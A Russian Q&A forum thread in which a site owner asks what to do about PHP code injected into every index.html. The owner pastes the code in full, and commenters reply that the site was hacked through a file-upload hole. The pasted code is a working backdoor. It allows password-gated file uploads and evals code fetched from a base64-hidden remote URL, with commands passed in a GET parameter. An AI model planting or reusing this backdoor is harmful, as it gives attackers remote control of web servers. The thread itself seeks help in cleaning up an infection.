Вредоносный код в начале страницы, что это может быть?

Question

[freelancepro]

Всем привет!
Во всех файлах index.html на всех сайтах, вверху страницы появился этот код:

<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
	move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
	eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
?>

и файлы index.html автоматически переименовываются в index.php

1-ый раз восстановил резервку, всё стало норм, но через неделю начал изменять старые файлы, снова появилось это же.

Что это может быть и как с этим бороться? Заранее спасибо!

Comments

[Алексей Уколов]

Какого ответа кроме "это вирус", вы ожидаете?

[freelancepro]

Алексей Уколов, p.s. и как с ним бороться?)

[sundrey]

Точного ответа, как бороться никто не даст. Скорее всего, злоумышленнику удается загрузить файл к Вам на сервер, и затем запустить его.
Старые CMS часто страдают подобным.

Answer 1

[Anton fon Faust]

похакали сайт. Смотрите, где-то дырка, позволяющая заливать всякую ересь.